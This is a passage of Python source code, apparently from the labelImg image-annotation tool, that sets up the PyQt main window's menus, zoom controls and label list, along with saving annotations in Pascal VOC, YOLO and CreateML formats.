deleteImg = action(getStr('deleteImg'), self.deleteImg, 'Ctrl+Shift+D', 'close', getStr('deleteImgDetail'))
resetAll = action(getStr('resetAll'), self.resetAll, None, 'resetall', getStr('resetAllDetail'))
color1 = action(getStr('boxLineColor'), self.chooseColor1,
'Ctrl+L', 'color_line', getStr('boxLineColorDetail'))
createMode = action(getStr('crtBox'), self.setCreateMode,
'w', 'new', getStr('crtBoxDetail'), enabled=False)
editMode = action('&Edit\nRectBox', self.setEditMode,
'Ctrl+J', 'edit', u'Move and edit Boxs', enabled=False)
create = action(getStr('crtBox'), self.createShape,
'w', 'new', getStr('crtBoxDetail'), enabled=False)
delete = action(getStr('delBox'), self.deleteSelectedShape,
'Delete', 'delete', getStr('delBoxDetail'), enabled=False)
copy = action(getStr('dupBox'), self.copySelectedShape,
'Ctrl+D', 'copy', getStr('dupBoxDetail'),
enabled=False)
advancedMode = action(getStr('advancedMode'), self.toggleAdvancedMode,
'Ctrl+Shift+A', 'expert', getStr('advancedModeDetail'),
checkable=True)
hideAll = action('&Hide\nRectBox', partial(self.togglePolygons, False),
'Ctrl+H', 'hide', getStr('hideAllBoxDetail'),
enabled=False)
showAll = action('&Show\nRectBox', partial(self.togglePolygons, True),
'Ctrl+A', 'hide', getStr('showAllBoxDetail'),
enabled=False)
help = action(getStr('tutorial'), self.showTutorialDialog, None, 'help', getStr('tutorialDetail'))
showInfo = action(getStr('info'), self.showInfoDialog, None, 'help', getStr('info'))
zoom = QWidgetAction(self)
zoom.setDefaultWidget(self.zoomWidget)
self.zoomWidget.setWhatsThis(
u"Zoom in or out of the image. Also accessible with"
" %s and %s from the canvas." % (fmtShortcut("Ctrl+[-+]"),
fmtShortcut("Ctrl+Wheel")))
self.zoomWidget.setEnabled(False)
zoomIn = action(getStr('zoomin'), partial(self.addZoom, 10),
'Ctrl++', 'zoom-in', getStr('zoominDetail'), enabled=False)
zoomOut = action(getStr('zoomout'), partial(self.addZoom, -10),
'Ctrl+-', 'zoom-out', getStr('zoomoutDetail'), enabled=False)
zoomOrg = action(getStr('originalsize'), partial(self.setZoom, 100),
'Ctrl+=', 'zoom', getStr('originalsizeDetail'), enabled=False)
fitWindow = action(getStr('fitWin'), self.setFitWindow,
'Ctrl+F', 'fit-window', getStr('fitWinDetail'),
checkable=True, enabled=False)
fitWidth = action(getStr('fitWidth'), self.setFitWidth,
'Ctrl+Shift+F', 'fit-width', getStr('fitWidthDetail'),
checkable=True, enabled=False)
# Group zoom controls into a list for easier toggling.
zoomActions = (self.zoomWidget, zoomIn, zoomOut,
zoomOrg, fitWindow, fitWidth)
self.zoomMode = self.MANUAL_ZOOM
self.scalers = {
self.FIT_WINDOW: self.scaleFitWindow,
self.FIT_WIDTH: self.scaleFitWidth,
# Set to one to scale to 100% when loading files.
self.MANUAL_ZOOM: lambda: 1,
}
edit = action(getStr('editLabel'), self.editLabel,
'Ctrl+E', 'edit', getStr('editLabelDetail'),
enabled=False)
self.editButton.setDefaultAction(edit)
shapeLineColor = action(getStr('shapeLineColor'), self.chshapeLineColor,
icon='color_line', tip=getStr('shapeLineColorDetail'),
enabled=False)
shapeFillColor = action(getStr('shapeFillColor'), self.chshapeFillColor,
icon='color', tip=getStr('shapeFillColorDetail'),
enabled=False)
labels = self.dock.toggleViewAction()
labels.setText(getStr('showHide'))
labels.setShortcut('Ctrl+Shift+L')
# Label list context menu.
labelMenu = QMenu()
addActions(labelMenu, (edit, delete))
self.labelList.setContextMenuPolicy(Qt.CustomContextMenu)
self.labelList.customContextMenuRequested.connect(
self.popLabelListMenu)
# Draw squares/rectangles
self.drawSquaresOption = QAction('Draw Squares', self)
self.drawSquaresOption.setShortcut('Ctrl+Shift+R')
self.drawSquaresOption.setCheckable(True)
self.drawSquaresOption.setChecked(settings.get(SETTING_DRAW_SQUARE, False))
self.drawSquaresOption.triggered.connect(self.toogleDrawSquare)
# Store actions for further handling.
self.actions = struct(save=save, save_format=save_format, saveAs=saveAs, open=open, close=close, resetAll = resetAll, deleteImg = deleteImg,
lineColor=color1, create=create, delete=delete, edit=edit, copy=copy,
createMode=createMode, editMode=editMode, advancedMode=advancedMode,
shapeLineColor=shapeLineColor, shapeFillColor=shapeFillColor,
zoom=zoom, zoomIn=zoomIn, zoomOut=zoomOut, zoomOrg=zoomOrg,
fitWindow=fitWindow, fitWidth=fitWidth,
zoomActions=zoomActions,
fileMenuActions=(
open, opendir, save, saveAs, close, resetAll, quit),
beginner=(), advanced=(),
editMenu=(edit, copy, delete,
None, color1, self.drawSquaresOption),
beginnerContext=(create, edit, copy, delete),
advancedContext=(createMode, editMode, edit, copy,
delete, shapeLineColor, shapeFillColor),
onLoadActive=(
close, create, createMode, editMode),
onShapesPresent=(saveAs, hideAll, showAll))
self.menus = struct(
file=self.menu('&File'),
edit=self.menu('&Edit'),
view=self.menu('&View'),
help=self.menu('&Help'),
recentFiles=QMenu('Open &Recent'),
labelList=labelMenu)
# Auto saving : Enable auto saving if pressing next
self.autoSaving = QAction(getStr('autoSaveMode'), self)
self.autoSaving.setCheckable(True)
self.autoSaving.setChecked(settings.get(SETTING_AUTO_SAVE, False))
# Sync single class mode from PR#106
self.singleClassMode = QAction(getStr('singleClsMode'), self)
self.singleClassMode.setShortcut("Ctrl+Shift+S")
self.singleClassMode.setCheckable(True)
self.singleClassMode.setChecked(settings.get(SETTING_SINGLE_CLASS, False))
self.lastLabel = None
# Add option to enable/disable labels being displayed at the top of bounding boxes
self.displayLabelOption = QAction(getStr('displayLabel'), self)
self.displayLabelOption.setShortcut("Ctrl+Shift+P")
self.displayLabelOption.setCheckable(True)
self.displayLabelOption.setChecked(settings.get(SETTING_PAINT_LABEL, False))
self.displayLabelOption.triggered.connect(self.togglePaintLabelsOption)
addActions(self.menus.file,
(open, opendir, copyPrevBounding, changeSavedir, openAnnotation, self.menus.recentFiles, save, save_format, saveAs, close, resetAll, deleteImg, quit))
addActions(self.menus.help, (help, showInfo))
addActions(self.menus.view, (
self.autoSaving,
self.singleClassMode,
self.displayLabelOption,
labels, advancedMode, None,
hideAll, showAll, None,
zoomIn, zoomOut, zoomOrg, None,
fitWindow, fitWidth))
self.menus.file.aboutToShow.connect(self.updateFileMenu)
# Custom context menu for the canvas widget:
addActions(self.canvas.menus[0], self.actions.beginnerContext)
addActions(self.canvas.menus[1], (
action('&Copy here', self.copyShape),
action('&Move here', self.moveShape)))
self.tools = self.toolbar('Tools')
self.actions.beginner = (
open, opendir, changeSavedir, openNextImg, openPrevImg, verify, save, save_format, None, create, copy, delete, None,
zoomIn, zoom, zoomOut, fitWindow, fitWidth)
self.actions.advanced = (
open, opendir, changeSavedir, openNextImg, openPrevImg, save, save_format, None,
createMode, editMode, None,
hideAll, showAll)
self.statusBar().showMessage('%s started.' % __appname__)
self.statusBar().show()
# Application state.
self.image = QImage()
self.filePath = ustr(defaultFilename)
self.lastOpenDir= None
self.recentFiles = []
self.maxRecent = 7
self.lineColor = None
self.fillColor = None
self.zoom_level = 100
self.fit_window = False
# Add Chris
self.difficult = False
## Fix the compatible issue for qt4 and qt5. Convert the QStringList to python list
if settings.get(SETTING_RECENT_FILES):
if have_qstring():
recentFileQStringList = settings.get(SETTING_RECENT_FILES)
self.recentFiles = [ustr(i) for i in recentFileQStringList]
else:
self.recentFiles = recentFileQStringList = settings.get(SETTING_RECENT_FILES)
size = settings.get(SETTING_WIN_SIZE, QSize(600, 500))
position = QPoint(0, 0)
saved_position = settings.get(SETTING_WIN_POSE, position)
# Fix the multiple monitors issue
for i in range(QApplication.desktop().screenCount()):
if QApplication.desktop().availableGeometry(i).contains(saved_position):
position = saved_position
break
self.resize(size)
self.move(position)
saveDir = ustr(settings.get(SETTING_SAVE_DIR, None))
self.lastOpenDir = ustr(settings.get(SETTING_LAST_OPEN_DIR, None))
if self.defaultSaveDir is None and saveDir is not None and os.path.exists(saveDir):
self.defaultSaveDir = saveDir
self.statusBar().showMessage('%s started. Annotation will be saved to %s' %
(__appname__, self.defaultSaveDir))
self.statusBar().show()
self.restoreState(settings.get(SETTING_WIN_STATE, QByteArray()))
Shape.line_color = self.lineColor = QColor(settings.get(SETTING_LINE_COLOR, DEFAULT_LINE_COLOR))
Shape.fill_color = self.fillColor = QColor(settings.get(SETTING_FILL_COLOR, DEFAULT_FILL_COLOR))
self.canvas.setDrawingColor(self.lineColor)
# Add chris
Shape.difficult = self.difficult
def xbool(x):
if isinstance(x, QVariant):
return x.toBool()
return bool(x)
if xbool(settings.get(SETTING_ADVANCE_MODE, False)):
self.actions.advancedMode.setChecked(True)
self.toggleAdvancedMode()
# Populate the File menu dynamically.
self.updateFileMenu()
# Since loading the file may take some time, make sure it runs in the background.
if self.filePath and os.path.isdir(self.filePath):
self.queueEvent(partial(self.importDirImages, self.filePath or ""))
elif self.filePath:
self.queueEvent(partial(self.loadFile, self.filePath or ""))
# Callbacks:
self.zoomWidget.valueChanged.connect(self.paintCanvas)
self.populateModeActions()
# Display cursor coordinates at the right of status bar
self.labelCoordinates = QLabel('')
self.statusBar().addPermanentWidget(self.labelCoordinates)
# Open Dir if deafult file
if self.filePath and os.path.isdir(self.filePath):
self.openDirDialog(dirpath=self.filePath, silent=True)
def keyReleaseEvent(self, event):
if event.key() == Qt.Key_Control:
self.canvas.setDrawingShapeToSquare(False)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Control:
# Draw rectangle if Ctrl is pressed
self.canvas.setDrawingShapeToSquare(True)
## Support Functions ##
def set_format(self, save_format):
if save_format == FORMAT_PASCALVOC:
self.actions.save_format.setText(FORMAT_PASCALVOC)
self.actions.save_format.setIcon(newIcon("format_voc"))
self.labelFileFormat = LabelFileFormat.PASCAL_VOC
LabelFile.suffix = XML_EXT
elif save_format == FORMAT_YOLO:
self.actions.save_format.setText(FORMAT_YOLO)
self.actions.save_format.setIcon(newIcon("format_yolo"))
self.labelFileFormat = LabelFileFormat.YOLO
LabelFile.suffix = TXT_EXT
elif save_format == FORMAT_CREATEML:
self.actions.save_format.setText(FORMAT_CREATEML)
self.actions.save_format.setIcon(newIcon("format_createml"))
self.labelFileFormat = LabelFileFormat.CREATE_ML
LabelFile.suffix = JSON_EXT
def change_format(self):
if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
self.set_format(FORMAT_YOLO)
elif self.labelFileFormat == LabelFileFormat.YOLO:
self.set_format(FORMAT_CREATEML)
elif self.labelFileFormat == LabelFileFormat.CREATE_ML:
self.set_format(FORMAT_PASCALVOC)
else:
raise ValueError('Unknown label file format.')
self.setDirty()
def noShapes(self):
return not self.itemsToShapes
def toggleAdvancedMode(self, value=True):
self._beginner = not value
self.canvas.setEditing(True)
self.populateModeActions()
self.editButton.setVisible(not value)
if value:
self.actions.createMode.setEnabled(True)
self.actions.editMode.setEnabled(False)
self.dock.setFeatures(self.dock.features() | self.dockFeatures)
else:
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
def populateModeActions(self):
if self.beginner():
tool, menu = self.actions.beginner, self.actions.beginnerContext
else:
tool, menu = self.actions.advanced, self.actions.advancedContext
self.tools.clear()
addActions(self.tools, tool)
self.canvas.menus[0].clear()
addActions(self.canvas.menus[0], menu)
self.menus.edit.clear()
actions = (self.actions.create,) if self.beginner()\
else (self.actions.createMode, self.actions.editMode)
addActions(self.menus.edit, actions + self.actions.editMenu)
def setBeginner(self):
self.tools.clear()
addActions(self.tools, self.actions.beginner)
def setAdvanced(self):
self.tools.clear()
addActions(self.tools, self.actions.advanced)
def setDirty(self):
self.dirty = True
self.actions.save.setEnabled(True)
def setClean(self):
self.dirty = False
self.actions.save.setEnabled(False)
self.actions.create.setEnabled(True)
def toggleActions(self, value=True):
"""Enable/Disable widgets which depend on an opened image."""
for z in self.actions.zoomActions:
z.setEnabled(value)
for action in self.actions.onLoadActive:
action.setEnabled(value)
def queueEvent(self, function):
QTimer.singleShot(0, function)
def status(self, message, delay=5000):
self.statusBar().showMessage(message, delay)
def resetState(self):
self.itemsToShapes.clear()
self.shapesToItems.clear()
self.labelList.clear()
self.filePath = None
self.imageData = None
self.labelFile = None
self.canvas.resetState()
self.labelCoordinates.clear()
self.comboBox.cb.clear()
def currentItem(self):
items = self.labelList.selectedItems()
if items:
return items[0]
return None
def addRecentFile(self, filePath):
if filePath in self.recentFiles:
self.recentFiles.remove(filePath)
elif len(self.recentFiles) >= self.maxRecent:
self.recentFiles.pop()
self.recentFiles.insert(0, filePath)
def beginner(self):
return self._beginner
def advanced(self):
return not self.beginner()
def getAvailableScreencastViewer(self):
osName = platform.system()
if osName == 'Windows':
return ['C:\\Program Files\\Internet Explorer\\iexplore.exe']
elif osName == 'Linux':
return ['xdg-open']
elif osName == 'Darwin':
return ['open']
## Callbacks ##
def showTutorialDialog(self):
subprocess.Popen(self.screencastViewer + [self.screencast])
def showInfoDialog(self):
from libs.__init__ import __version__
msg = u'Name:{0} \nApp Version:{1} \n{2} '.format(__appname__, __version__, sys.version_info)
QMessageBox.information(self, u'Information', msg)
def createShape(self):
assert self.beginner()
self.canvas.setEditing(False)
self.actions.create.setEnabled(False)
def toggleDrawingSensitive(self, drawing=True):
"""In the middle of drawing, toggling between modes should be disabled."""
self.actions.editMode.setEnabled(not drawing)
if not drawing and self.beginner():
# Cancel creation.
print('Cancel creation.')
self.canvas.setEditing(True)
self.canvas.restoreCursor()
self.actions.create.setEnabled(True)
def toggleDrawMode(self, edit=True):
self.canvas.setEditing(edit)
self.actions.createMode.setEnabled(edit)
self.actions.editMode.setEnabled(not edit)
def setCreateMode(self):
assert self.advanced()
self.toggleDrawMode(False)
def setEditMode(self):
assert self.advanced()
self.toggleDrawMode(True)
self.labelSelectionChanged()
def updateFileMenu(self):
currFilePath = self.filePath
def exists(filename):
return os.path.exists(filename)
menu = self.menus.recentFiles
menu.clear()
files = [f for f in self.recentFiles if f !=
currFilePath and exists(f)]
for i, f in enumerate(files):
icon = newIcon('labels')
action = QAction(
icon, '&%d %s' % (i + 1, QFileInfo(f).fileName()), self)
action.triggered.connect(partial(self.loadRecent, f))
menu.addAction(action)
def popLabelListMenu(self, point):
self.menus.labelList.exec_(self.labelList.mapToGlobal(point))
def editLabel(self):
if not self.canvas.editing():
return
item = self.currentItem()
if not item:
return
text = self.labelDialog.popUp(item.text())
if text is not None:
item.setText(text)
item.setBackground(generateColorByText(text))
self.setDirty()
self.updateComboBox()
# Tzutalin 20160906 : Add file list and dock to move faster
def fileitemDoubleClicked(self, item=None):
currIndex = self.mImgList.index(ustr(item.text()))
if currIndex < len(self.mImgList):
filename = self.mImgList[currIndex]
if filename:
self.loadFile(filename)
# Add chris
def btnstate(self, item= None):
""" Function to handle difficult examples
Update on each object """
if not self.canvas.editing():
return
item = self.currentItem()
if not item: # If not selected Item, take the first one
item = self.labelList.item(self.labelList.count()-1)
difficult = self.diffcButton.isChecked()
try:
shape = self.itemsToShapes[item]
except:
pass
# Checked and Update
try:
if difficult != shape.difficult:
shape.difficult = difficult
self.setDirty()
else: # User probably changed item visibility
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
except:
pass
# React to canvas signals.
def shapeSelectionChanged(self, selected=False):
if self._noSelectionSlot:
self._noSelectionSlot = False
else:
shape = self.canvas.selectedShape
if shape:
self.shapesToItems[shape].setSelected(True)
else:
self.labelList.clearSelection()
self.actions.delete.setEnabled(selected)
self.actions.copy.setEnabled(selected)
self.actions.edit.setEnabled(selected)
self.actions.shapeLineColor.setEnabled(selected)
self.actions.shapeFillColor.setEnabled(selected)
def addLabel(self, shape):
shape.paintLabel = self.displayLabelOption.isChecked()
item = HashableQListWidgetItem(shape.label)
item.setFlags(item.flags() | Qt.ItemIsUserCheckable)
item.setCheckState(Qt.Checked)
item.setBackground(generateColorByText(shape.label))
self.itemsToShapes[item] = shape
self.shapesToItems[shape] = item
self.labelList.addItem(item)
for action in self.actions.onShapesPresent:
action.setEnabled(True)
self.updateComboBox()
def remLabel(self, shape):
if shape is None:
# print('rm empty label')
return
item = self.shapesToItems[shape]
self.labelList.takeItem(self.labelList.row(item))
del self.shapesToItems[shape]
del self.itemsToShapes[item]
self.updateComboBox()
def loadLabels(self, shapes):
s = []
for label, points, line_color, fill_color, difficult in shapes:
shape = Shape(label=label)
for x, y in points:
# Ensure the labels are within the bounds of the image. If not, fix them.
x, y, snapped = self.canvas.snapPointToCanvas(x, y)
if snapped:
self.setDirty()
shape.addPoint(QPointF(x, y))
shape.difficult = difficult
shape.close()
s.append(shape)
if line_color:
shape.line_color = QColor(*line_color)
else:
shape.line_color = generateColorByText(label)
if fill_color:
shape.fill_color = QColor(*fill_color)
else:
shape.fill_color = generateColorByText(label)
self.addLabel(shape)
self.updateComboBox()
self.canvas.loadShapes(s)
def updateComboBox(self):
# Get the unique labels and add them to the Combobox.
itemsTextList = [str(self.labelList.item(i).text()) for i in range(self.labelList.count())]
uniqueTextList = list(set(itemsTextList))
# Add a null row for showing all the labels
uniqueTextList.append("")
uniqueTextList.sort()
self.comboBox.update_items(uniqueTextList)
def saveLabels(self, annotationFilePath):
annotationFilePath = ustr(annotationFilePath)
if self.labelFile is None:
self.labelFile = LabelFile()
self.labelFile.verified = self.canvas.verified
def format_shape(s):
return dict(label=s.label,
line_color=s.line_color.getRgb(),
fill_color=s.fill_color.getRgb(),
points=[(p.x(), p.y()) for p in s.points],
# add chris
difficult = s.difficult)
shapes = [format_shape(shape) for shape in self.canvas.shapes]
# Can add differrent annotation formats here
try:
if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
if annotationFilePath[-4:].lower() != ".xml":
annotationFilePath += XML_EXT
self.labelFile.savePascalVocFormat(annotationFilePath, shapes, self.filePath, self.imageData,
self.lineColor.getRgb(), self.fillColor.getRgb())
elif self.labelFileFormat == LabelFileFormat.YOLO:
if annotationFilePath[-4:].lower() != ".txt":
annotationFilePath += TXT_EXT
self.labelFile.saveYoloFormat(annotationFilePath, shapes, self.filePath, self.imageData, self.labelHist,
self.lineColor.getRgb(), self.fillColor.getRgb())
elif self.labelFileFormat == LabelFileFormat.CREATE_ML:
if annotationFilePath[-5:].lower() != ".json":
annotationFilePath += JSON_EXT
self.labelFile.saveCreateMLFormat(annotationFilePath, shapes, self.filePath, self.imageData,
self.labelHist, self.lineColor.getRgb(), self.fillColor.getRgb())
else:
self.labelFile.save(annotationFilePath, shapes, self.filePath, self.imageData,
self.lineColor.getRgb(), self.fillColor.getRgb())
print('Image:{0} -> Annotation:{1}'.format(self.filePath, annotationFilePath))
return True
except LabelFileError as e:
self.errorMessage(u'Error saving label data', u'<b>%s</b>' % e)
return False
def copySelectedShape(self):
self.addLabel(self.canvas.copySelectedShape())
# fix copy and delete
self.shapeSelectionChanged(True)
def comboSelectionChanged(self, index):
text = self.comboBox.cb.itemText(index)
for i in range(self.labelList.count()):
if text == "":
self.labelList.item(i).setCheckState(2)
elif text != self.labelList.item(i).text():
self.labelList.item(i).setCheckState(0)
else:
self.labelList.item(i).setCheckState(2)
def labelSelectionChanged(self):
item = self.currentItem()
if item and self.canvas.editing():
self._noSelectionSlot = True
self.canvas.selectShape(self.itemsToShapes[item])
shape = self.itemsToShapes[item]
# Add Chris
self.diffcButton.setChecked(shape.difficult)
def labelItemChanged(self, item):
shape = self.itemsToShapes[item]
label = item.text()
if label != shape.label:
shape.label = item.text()
shape.line_color = generateColorByText(shape.label)
self.setDirty()
else: # User probably changed item visibility
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
# Callback functions:
def newShape(self):
"""Pop-up and give focus to the label editor.
position MUST be in global coordinates.
"""
if not self.useDefaultLabelCheckbox.isChecked() or not self.defaultLabelTextLine.text():
if len(self.labelHist) > 0:
self.labelDialog = LabelDialog(
parent=self, listItem=self.labelHist)
# Sync single class mode from PR#106
if self.singleClassMode.isChecked() and self.lastLabel:
text = self.lastLabel
else:
text = self.labelDialog.popUp(text=self.prevLabelText)
self.lastLabel = text
else:
text = self.defaultLabelTextLine.text()
# Add Chris
self.diffcButton.setChecked(False)
if text is not None:
self.prevLabelText = text
generate_color = generateColorByText(text)
shape = self.canvas.setLastLabel(text, generate_color, generate_color)
self.addLabel(shape)
if self.beginner(): # Switch to edit mode.
self.canvas.setEditing(True)
self.actions.create.setEnabled(True)
else:
self.actions.editMode.setEnabled(True)
self.setDirty()
if text not in self.labelHist:
self.labelHist.append(text)
else:
# self.canvas.undoLastLine()
self.canvas.resetAllLines()
def scrollRequest(self, delta, orientation):
units = - delta / (8 * 15)
bar = self.scrollBars[orientation]
bar.setValue(bar.value() + bar.singleStep() * units)
def setZoom(self, value):
self.actions.fitWidth.setChecked(False)
self.actions.fitWindow.setChecked(False)
self.zoomMode = self.MANUAL_ZOOM
self.zoomWidget.setValue(value)
def addZoom(self, increment=10):
self.setZoom(self.zoomWidget.value() + increment)
def zoomRequest(self, delta):
# get the current scrollbar positions
# calculate the percentages ~ coordinates
h_bar = self.scrollBars[Qt.Horizontal]
v_bar = self.scrollBars[Qt.Vertical]
# get the current maximum, to know the difference after zooming
h_bar_max = h_bar.maximum()
v_bar_max = v_bar.maximum()
# get the cursor position and canvas size
# calculate the desired movement from 0 to 1
# where 0 = move left
# 1 = move right
# up and down analogous
cursor = QCursor()
pos = cursor.pos()
relative_pos = QWidget.mapFromGlobal(self, pos)
cursor_x = relative_pos.x()
cursor_y = relative_pos.y()
w = self.scrollArea.width()
h = self.scrollArea.height()
# the scaling from 0 to 1 has some padding
# you don't have to hit the very leftmost pixel for a maximum-left movement
margin = 0.1
move_x = (cursor_x - margin * w) / (w - 2 * margin * w)
move_y = (cursor_y - margin * h) / (h - 2 * margin * h)
# clamp the values from 0 to 1
move_x = min(max(move_x, 0), 1)
move_y = min(max(move_y, 0), 1)
# zoom in
units = delta / (8 * 15)
scale = 10
self.addZoom(scale * units)
# get the difference in scrollbar values
# this is how far we can move
d_h_bar_max = h_bar.maximum() - h_bar_max
d_v_bar_max = v_bar.maximum() - v_bar_max
# get the new scrollbar values
new_h_bar_value = h_bar.value() + move_x * d_h_bar_max
new_v_bar_value = v_bar.value() + move_y * d_v_bar_max
h_bar.setValue(new_h_bar_value)
v_bar.setValue(new_v_bar_value)
def setFitWindow(self, value=True):
if value:
self.actions.fitWidth.setChecked(False)
self.zoomMode = self.FIT_WINDOW if value else self.MANUAL_ZOOM
self.adjustScale()
def setFitWidth(self, value=True):
if value:
self.actions.fitWindow.setChecked(False)
self.zoomMode = self.FIT_WIDTH if value else self.MANUAL_ZOOM
self.adjustScale()
def togglePolygons(self, value):
for item, shape in self.itemsToShapes.items():
item.setCheckState(Qt.Checked if value else Qt.Unchecked)
def loadFile(self, filePath=None):
"""Load the specified file, or the last opened file if None."""
self.resetState()
self.canvas.setEnabled(False)
if filePath is None:
filePath = self.settings.get(SETTING_FILENAME)
# Make sure that filePath is a regular python string, rather than QString
filePath = ustr(filePath)
# Fix bug: An index error after select a directory when open a new file.
unicodeFilePath = ustr(filePath)
unicodeFilePath = os.path.abspath(unicodeFilePath)
# Tzutalin 20160906 : Add file list and dock to move faster
# Highlight the file item
if unicodeFilePath and self.fileListWidget.count() > 0:
if unicodeFilePath in self.mImgList:
index = self.mImgList.index(unicodeFilePath)
fileWidgetItem = self.fileListWidget.item(index)
fileWidgetItem.setSelected(True)
else:
self.fileListWidget.clear()
self.mImgList.clear()
if unicodeFilePath and os.path.exists(unicodeFilePath):
if LabelFile.isLabelFile(unicodeFilePath):
try:
self.labelFile = LabelFile(unicodeFilePath)
except LabelFileError as e:
self.errorMessage(u'Error opening file',
(u"<p><b>%s</b></p>"
u"<p>Make sure <i>%s</i> is a valid label file.")
% (e, unicodeFilePath))
self.status("Error reading %s" % unicodeFilePath)
return False
self.imageData = self.labelFile.imageData
self.lineColor = QColor(*self.labelFile.lineColor)
self.fillColor = QColor(*self.labelFile.fillColor)
self.canvas.verified = self.labelFile.verified
else:
# Load image:
# read data first and store for saving into label file.
self.imageData = read(unicodeFilePath, None)
self.labelFile = None
self.canvas.verified = False
if isinstance(self.imageData, QImage):
image = self.imageData
else:
image = QImage.fromData(self.imageData)
if image.isNull():
self.errorMessage(u'Error opening file',
u"<p>Make sure <i>%s</i> is a valid image file." % unicodeFilePath)
self.status("Error reading %s" % unicodeFilePath)
return False
self.status("Loaded %s" % os.path.basename(unicodeFilePath))
self.image = image
self.filePath = unicodeFilePath
self.canvas.loadPixmap(QPixmap.fromImage(image))
if self.labelFile:
self.loadLabels(self.labelFile.shapes)
self.setClean()
self.canvas.setEnabled(True)
self.adjustScale(initial=True)
self.paintCanvas()
self.addRecentFile(self.filePath)
self.toggleActions(True)
self.showBoundingBoxFromAnnotationFile(filePath)
self.setWindowTitle(__appname__ + ' ' + filePath)
# Default : select last item if there is at least one item
if self.labelList.count():
self.labelList.setCurrentItem(self.labelList.item(self.labelList.count()-1))
self.labelList.item(self.labelList.count()-1).setSelected(True)
self.canvas.setFocus(True)
return True
return False
def showBoundingBoxFromAnnotationFile(self, filePath):
if self.defaultSaveDir is not None:
basename = os.path.basename(
os.path.splitext(filePath)[0])
filedir = filePath.split(basename)[0].split(os.path.sep)[-2:-1][0]
xmlPath = os.path.join(self.defaultSaveDir, basename + XML_EXT)
txtPath = os.path.join(self.defaultSaveDir, basename + TXT_EXT)
jsonPath = os.path.join(self.defaultSaveDir, filedir + JSON_EXT)
"""Annotation file priority:
PascalXML > YOLO
"""
if os.path.isfile(xmlPath):
self.loadPascalXMLByFilename(xmlPath)
elif os.path.isfile(txtPath):
self.loadYOLOTXTByFilename(txtPath)
elif os.path.isfile(jsonPath):
self.loadCreateMLJSONByFilename(jsonPath, filePath)
else:
xmlPath = os.path.splitext(filePath)[0] + XML_EXT
txtPath = os.path.splitext(filePath)[0] + TXT_EXT
if os.path.isfile(xmlPath):
self.loadPascalXMLByFilename(xmlPath)
elif os.path.isfile(txtPath):
self.loadYOLOTXTByFilename(txtPath)
def resizeEvent(self, event):
if self.canvas and not self.image.isNull()\
and self.zoomMode != self.MANUAL_ZOOM:
self.adjustScale()
super(MainWindow, self).resizeEvent(event)
def paintCanvas(self):
assert not self.image.isNull(), "cannot paint null image"
self.canvas.scale = 0.01 * self.zoomWidget.value()
self.canvas.adjustSize()
self.canvas.update()
def adjustScale(self, initial=False):
value = self.scalers[self.FIT_WINDOW if initial else self.zoomMode]()
self.zoomWidget.setValue(int(100 * value))
def scaleFitWindow(self):
"""Figure out the size of the pixmap in order to fit the main widget."""
e = 2.0 # So that no scrollbars are generated.
w1 = self.centralWidget().width() - e
h1 = self.centralWidget().height() - e
a1 = w1 / h1
# Calculate a new scale value based on the pixmap's aspect ratio.
w2 = self.canvas.pixmap.width() - 0.0
h2 = self.canvas.pixmap.height() - 0.0
a2 = w2 / h2
return w1 / w2 if a2 >= a1 else h1 / h2
def scaleFitWidth(self):
# The epsilon does not seem to work too well here.
w = self.centralWidget().width() - 2.0
return w / self.canvas.pixmap.width()
def closeEvent(self, event):
if not self.mayContinue():
event.ignore()
settings = self.settings
# If it loads images from dir, don't load it at the begining
if self.dirname is None:
settings[SETTING_FILENAME] = self.filePath if self.filePath else ''
else:
settings[SETTING_FILENAME] = ''
settings[SETTING_WIN_SIZE] = self.size()
settings[SETTING_WIN_POSE] = self.pos()
settings[SETTING_WIN_STATE] = self.saveState()
settings[SETTING_LINE_COLOR] = self.lineColor
settings[SETTING_FILL_COLOR] = self.fillColor
settings[SETTING_RECENT_FILES] = self.recentFiles
settings[SETTING_ADVANCE_MODE] = not self._beginner
if self.defaultSaveDir and os.path.exists(self.defaultSaveDir):
settings[SETTING_SAVE_DIR] = ustr(self.defaultSaveDir)
else:
settings[SETTING_SAVE_DIR] = ''
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
settings[SETTING_LAST_OPEN_DIR] = self.lastOpenDir
else:
settings[SETTING_LAST_OPEN_DIR] = ''
settings[SETTING_AUTO_SAVE] = self.autoSaving.isChecked()
settings[SETTING_SINGLE_CLASS] = self.singleClassMode.isChecked()
settings[SETTING_PAINT_LABEL] = self.displayLabelOption.isChecked()
settings[SETTING_DRAW_SQUARE] = self.drawSquaresOption.isChecked()
settings[SETTING_LABEL_FILE_FORMAT] = self.labelFileFormat
settings.save()
def loadRecent(self, filename):
if self.mayContinue():
self.loadFile(filename)
def scanAllImages(self, folderPath):
extensions = ['.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
images = []
for root, dirs, files in os.walk(folderPath):
for file in files:
if file.lower().endswith(tuple(extensions)):
relativePath = os.path.join(root, file)
path = ustr(os.path.abspath(relativePath))
images.append(path)
natural_sort(images, key=lambda x: x.lower())
return images
def changeSavedirDialog(self, _value=False):
if self.defaultSaveDir is not None:
path = ustr(self.defaultSaveDir)
else:
path = '.'
dirpath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Save annotations to the directory' % __appname__, path, QFileDialog.ShowDirsOnly
| QFileDialog.DontResolveSymlinks))
if dirpath is not None and len(dirpath) > 1:
self.defaultSaveDir = dirpath
self.statusBar().showMessage('%s . Annotation will be saved to %s' %
('Change saved folder', self.defaultSaveDir))
self.statusBar().show()
def openAnnotationDialog(self, _value=False):
if self.filePath is None:
self.statusBar().showMessage('Please select image first')
self.statusBar().show()
return
path = os.path.dirname(ustr(self.filePath))\
if self.filePath else '.'
if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
filters = "Open Annotation XML file (%s)" % ' '.join(['*.xml'])
filename = ustr(QFileDialog.getOpenFileName(self,'%s - Choose a xml file' % __appname__, path, filters))
if filename:
if isinstance(filename, (tuple, list)):
filename = filename[0]
self.loadPascalXMLByFilename(filename)
def openDirDialog(self, _value=False, dirpath=None, silent=False):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
